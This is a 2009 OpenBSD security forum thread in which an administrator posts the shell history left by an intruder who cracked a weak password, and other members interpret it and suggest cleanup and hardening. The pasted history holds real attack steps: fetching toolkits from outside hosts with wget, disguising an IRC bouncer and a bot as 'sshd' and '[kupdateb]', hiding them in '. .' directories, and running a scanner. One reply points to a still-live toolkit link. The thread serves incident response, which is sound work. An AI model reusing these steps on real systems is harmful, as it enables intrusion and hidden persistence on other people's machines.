DaemonForums  

Go Back   DaemonForums > OpenBSD > OpenBSD Security

OpenBSD Security Functionally paranoid!

Reply
 
Thread Tools Display Modes
  #1   (View Single Post)  
Old 30th June 2009
knasbas knasbas is offline
Port Guard
 
Join Date: May 2008
Posts: 25
Thanked 0 Times in 0 Posts
Default weak password=broken

I just found out that a user had a weak password and it was broken. How do i trace what a user been doing?
Only see brief info in .bash_history (below)
Any help at all is welcome, ive changed password and deleted the 2 directorys ive found.
Not a single hit on robotbsd in google makes me a bit worried.
Code:
ls
ps 'ux
uname
uname -a
uptime
wget
w
passwd
ls
uname -a
fetch www.psybnc.net/psyBNC-2.3.2-7.tar.gz
wget
wget www.psybnc.net/psyBNC-2.3.2-7.tar.gz
ls
tar xvf psyBNC-2.3.2-7.tar.gz
tar xzvf psyBNC-2.3.2-7.tar.gz
ls
cd psybnc
ls
ls
pico menuconf
pico config.h
ls
pico psybncchk
ls
pico CHANGES
make
ls
pico psybnc.conf
ls
rm -rf salt.h
mv psybnc sshd
export PATH="."
sshd
ps -ux
ls
exit
ps-ux
ps -ux
ls
kill -9 29089
ps -ux
kill -9 28097
ps -ux
ls
cd psybnc
ls
pico psybnc.conf
ls
sshd
export PATH="."
sshd
ps -ux
ls
exit
ls
-ps -ux
ls
ps -ux
ls
kill -9 12813
ls
ps -ux
ls
cd psybnc
ls
mv sshd bash
./bash
ps -ux
kill -9 12169
ls
cd ..
ls
wget badry.uv.ro/robotlinux.tgz
ls
tar xvf robotlinux.tgz
cd ". .".l
ls
pico mech.set
./[kupdateb]
[kupdateb]
export PATH="."
[kupdateb]
ls
exit
ls
ls -a
cd /var/tmp
mkdir roxy
cd roxy/
ls
ls -a
wget badry.uv.ro/robotbsd.tgz
ls
tar xvf robotbsd.tgz
ls
cd ". .".b
ls
ls
pico m.session
ls
./[kupdateb]
chmod +x *
ls
[kupdateb]
./
[kupdateb]
ls
cd ..
ls
ls
exit
ls
ps -ux
cd psybnc
ls
cd ..
ls
rm -rf psybnc
ls
tar xvf psyBNC-2.3.2-7.tar.gz
tar xzvf psyBNC-2.3.2-7.tar.gz
ls
cd psybnc
ls
make
ls
mv psybnc bash
./bash
ps -ux
ls
w
uname -a
uptime
exit
ls
ps -ux
ls -a
exit
ps -ux
uname -a
uptime
ls -a
ls -a
exit
ps -ux
uname -a
ls -a
cd ". .".l
ls
./[kupdateb]
ls
cd /var/tmp
ls
ls
wget badry.uv.ro/robotbsd.tgz
ls
tar xvf robotbsd.tgz
ls
cd ". .".b
ls
./[kupdateb]
ls
ps -ux
uname -a
uptime
ls
cd ..
ls
ls
wget bucus.tvn.hu/wtf.tgz
ls
ftp
tar xvf wtf.tgz
ls
cd wtf
ls
./a 21.21
rm -rf a1
rm -rf scam
./a 53.21
exit
Reply With Quote
  #2   (View Single Post)  
Old 1st July 2009
Carpetsmoker's Avatar
Carpetsmoker Carpetsmoker is offline
Real Name: Martin
Old man from scene 24
 
Join Date: Apr 2008
Location: Eindhoven, Netherlands
Posts: 2,062
Thanked 198 Times in 156 Posts
Default

Some programs were executed.
psybnc is ``an easy-to-use, multi-user, permanent IRC-Bouncer'', not sure what is means.
It was executed under the name sshd to hide it.

I don't know what the other files are, but the filenames ``robotbsd.tgz'' and``robotlinux.tgz'' don't sound very good, it was executed under the name ./[kupdateb] to hide it.

The intruder never had root accress, right? (Through sudo).

If so, you can probably undo most harm by making sure there is nothing in this user's crontab and by rebooting the machine, anything the intruder executed will be shut down.
__________________
UNIX was not designed to stop you from doing stupid things, because that would also stop you from doing clever things.
Reply With Quote
  #3   (View Single Post)  
Old 1st July 2009
s2scott's Avatar
s2scott s2scott is offline
Package Pilot
 
Join Date: May 2008
Location: Toronto, Ontario Canada
Posts: 198
Thanked 9 Times in 8 Posts
Default

Quote:
Originally Posted by knasbas View Post
How do i trace what a user been doing?
On the simple side, using ...

tcpdump and/or pftop (if installed)

you can "watch" your box's actual network traffic to see who's NOW talking to you and with whom your talking to. If you cannot account for the sessions you see, then you are OPERATING as compromised host.

The very nature of an IM/IRC "bot" would suggest that you're going to see lots and lots of sessions.

In the bash history, where you see
Code:
./a 21.21
are obfuscated and powerful system calls, where the hacker knows what 21.21 is.

/S
__________________
Never argue with an idiot. They will bring you down to their level and beat you with experience.
Reply With Quote
  #4   (View Single Post)  
Old 1st July 2009
Beastie Beastie is offline
Daemonology student
 
Join Date: Jan 2009
Location: /dev/earth0
Posts: 269
Thanked 23 Times in 23 Posts
Default

The Hungarian link is still functional, so go get wtf.tgz. It's a real script kiddy's toolkit. There's even word dictionaries. It also has the a shell script that was copied to the compromised account's directory. It may help you trace any changes made.

For the next time (I truly hope there won't be any), please enforce strict password policies, like setting minimum length, with both low and uppercase alphanumeric sets.

And check the handbook, part III (System Administration), especially chapters 13 to 17. There are many good security tips.
__________________
May the source be with you!

Last edited by Beastie; 1st July 2009 at 06:11 PM.
Reply With Quote
  #5   (View Single Post)  
Old 1st July 2009
jggimi's Avatar
jggimi jggimi is offline
More noise than signal
 
Join Date: May 2008
Location: USA
Posts: 3,610
Thanked 214 Times in 189 Posts
Default

Quote:
Originally Posted by Beastie View Post
...And check the handbook...
Wrong OS, Beastie.

I don't worry much about strong/weak passwords, knasbas. That's because I don't use password authentication at all with sshd. (I only permit public key or S/Key authentication.)
Reply With Quote
  #6   (View Single Post)  
Old 1st July 2009
BSDfan666 BSDfan666 is offline
Real Name: N/A, this is the interweb.
Helpful companion
 
Join Date: Apr 2008
Location: Ontario, Canada
Posts: 2,223
Thanked 193 Times in 184 Posts
Default

What handbook Beastie? aren't you a little lost?
  • Use public key authentication.
  • Punish the user responsible for using a weak password, i.e: by locking the account.. or waterboarding.
Hope that helps..
Reply With Quote
  #7   (View Single Post)  
Old 1st July 2009
Beastie Beastie is offline
Daemonology student
 
Join Date: Jan 2009
Location: /dev/earth0
Posts: 269
Thanked 23 Times in 23 Posts
Default

Ah sorry for that. I KNEW I was in the OpenBSD section and yet I was still thinking about the FreeBSD handbook.

However, most topics there are common to both systems (and many others), some are general tips that can apply to any situation and some provide general information about the use and configuration of third-party software or software common to both systems.
__________________
May the source be with you!
Reply With Quote
Reply

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump

Similar Threads
Thread Thread Starter Forum Replies Last Post
A failure in password security TerryP Off-Topic 3 25th September 2008 03:19 AM
Set password for Folder mfaridi FreeBSD Security 6 5th September 2008 10:49 PM
Anyone Install Password Gorilla revzalot OpenBSD Installation and Upgrading 3 26th August 2008 03:58 AM
root password is blank mfaridi FreeBSD Security 10 16th May 2008 10:19 PM


All times are GMT. The time now is 01:06 PM.


Powered by vBulletin® Version 3.8.4
Copyright ©2000 - 2014, Jelsoft Enterprises Ltd.
Content copyright © 2007-2010, the authors
Daemon image copyright ©1988, Marshall Kirk McKusick